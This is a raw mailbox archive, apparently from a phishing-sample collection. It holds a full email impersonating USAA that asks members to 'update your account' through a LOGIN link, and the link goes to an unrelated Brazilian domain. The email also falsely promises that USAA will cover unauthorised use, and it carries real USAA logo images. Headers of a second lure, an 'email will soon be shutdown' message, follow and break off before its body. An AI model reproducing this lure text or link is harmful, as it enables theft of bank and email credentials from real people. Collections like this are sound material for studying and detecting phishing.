From: "USAA" <USAA.update@customermail.com>
Date: Tue, 26 Apr 2016 00:11:58 -0400
Status: O
X-Status: 
X-Keywords:                  
X-UID: 188

You will not see this in a MIME-aware mail reader.
--===============0591232443==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

  =

Dear Member, =

 =

 In an effort to safeguard your information, USAA helps to actively protect=
 and monitor your account in multiple ways. Logon to update your account to=
 avoid been compromised. We are constantly developing new security features=
 so that you can be a member of a more secure world. =

 =

Here=92s what you need to do:
 For immediate and continious access to your account now follow
 LOGIN and follow the prompted instructions, once completed USAA will be re=
sponsible for any unauthourize use of your account now or in the future. =

 We value our relationship with you and thank you for choosing USAA. =

 =

 Sincerely, =

 USAA Online Team
--===============0591232443==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><img style=3D"margin-right:0px;" id=3D"yiv4632079691yui_3=
_16_0_1_1420517464756_222715" title=3D"USAA Member Home" alt=3D"USAA Member=
 Home" src=3D"https://content.usaa.com/mcontent/static_assets/Media/logo.gi=
f?cacheid=3D2017356039" width=3D"61" height=3D"64"> <a rel=3D"nofollow" id=
=3D"yiv4632079691yui_3_16_0_1_1420517464756_222682" class=3D"yiv4632079691"=
 target=3D"_blank" href=3D"http://www.usaa.com/inet/ent_utils/McStaticPages=
?key=3Dsecurity_guarantee"><img style=3D"margin-right:0px;" id=3D"yiv463207=
9691yui_3_16_0_1_1420517464756_222681" title=3D"usaa.com is a Secure Site" =
alt=3D"usaa.com is a Secure Site" src=3D"http://content.usaa.com/mcontent/s=
tatic_assets/Media/securityMessage.gif?cacheid=3D864182426" width=3D"93" he=
ight=3D"26"></a>
<br>Dear Member,
<br>
<br>

In an effort to safeguard your information, <font id=3D"yiv4632079691yui_3_=
16_0_1_1420517464756_222692" style=3D"font-size:9pt;" face=3D"Verdana"><fon=
t id=3D"yiv4632079691yui_3_16_0_1_1420517464756_222711" style=3D"font-size:=
8pt;" face=3D"Verdana">USAA</font></font> helps to actively protect and mon=
itor your account in multiple ways. Logon to update your account to avoid b=
een compromised. We are constantly developing new security features so that=
 you can be a member of a more secure world.

<br>
<b><br>Here=E2=80=99s what you need to do:</b><br>

For immediate and continious access to your account now follow<br>
<a rel=3D"nofollow" target=3D"_blank" href=3D"http://cargamaxima.com.br/.in=
dustry/redirect.html" target=3D"_blank">LOGIN</a>
and follow the prompted instructions, once completed <font id=3D"yiv4632079=
691yui_3_16_0_1_1420517464756_222692" style=3D"font-size:9pt;" face=3D"Verd=
ana"><font id=3D"yiv4632079691yui_3_16_0_1_1420517464756_222711" style=3D"f=
ont-size:8pt;" face=3D"Verdana">USAA</font></font> will be responsible for =

any unauthourize use of your account now or in the future. =

<br>
We value our relationship with you and thank you for choosing <font id=3D"y=
iv4632079691yui_3_16_0_1_1420517464756_222692" style=3D"font-size:9pt;" fac=
e=3D"Verdana"><font id=3D"yiv4632079691yui_3_16_0_1_1420517464756_222711" s=
tyle=3D"font-size:8pt;" face=3D"Verdana">USAA</font></font>.
<br>
<br>
Sincerely, =

<br>
<font id=3D"yiv4632079691yui_3_16_0_1_1420517464756_222692" style=3D"font-s=
ize:9pt;" face=3D"Verdana"><font id=3D"yiv4632079691yui_3_16_0_1_1420517464=
756_222711" style=3D"font-size:8pt;" face=3D"Verdana">USAA</font></font> On=
line Team</html>
--===============0591232443==--

From jose@monkey.org Wed Apr 27 08:11:08 2016 +0000
Return-Path: mobile@mdl.net
Delivered-To: jose@monkey.org
X-FDA: 71451237816.25.hook38_609e742fc6446
X-Spam-Summary: 30,2,0,2752edd03363e17d,d41d8cd98f00b204,mobile@mdl.net,:,RULES_HIT:41:72:355:379:494:495:800:962:966:967:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1397:1431:1433:1434:1436:1437:1516:1517:1518:1535:1542:1568:1571:1575:1588:1592:1594:1685:1711:1714:1730:1777:1792:2069:2070:2196:2198:2199:2200:2525:2557:2565:2682:2685:2693:2859:2892:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3804:3865:3866:3867:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4385:4552:5007:6238:6261:6630:6669:7652:7903:8516:8517:8599:8603:8784:8825:8957:8987:9025:9040:9080:9121:9388:9545:10004:10049:10214:10400:11073:11233:11657:11658:11914:12043:12050:12295:12517:12519:12555:12658:12660:12973:13005:13017:13018:13019:13025:13095:13139:13142:13230:13439:13846:13898:14051:14093:14096:14181:14721:21067:21080:21364:21433,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:error
X-HE-Tag: hook38_609e742fc6446
X-Filterd-Recvd-Size: 5173
Received: from mail.mdl.net (mail.mdl.net [212.56.192.95])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 27 Apr 2016 08:11:03 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by mx.net.md (Postfix) with ESMTP id 795DF5114402
	for <jose@monkey.org>; Wed, 27 Apr 2016 11:09:33 +0300 (EEST)
Received: from mx.net.md ([127.0.0.1])
	by localhost (mx.net.md [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id 88mXaUgYKQPI for <jose@monkey.org>;
	Wed, 27 Apr 2016 11:09:33 +0300 (EEST)
Received: from [192.168.1.100] (unknown [212.100.76.4])
	by mx.net.md (Postfix) with ESMTPA id 52E4A5114407
	for <jose@monkey.org>; Wed, 27 Apr 2016 11:09:32 +0300 (EEST)
Content-Type: multipart/alternative; boundary="===============0588958491=="
MIME-Version: 1.0
Subject: Your email jose@monkey.org will soon be shutdown
To: jose@monkey.org
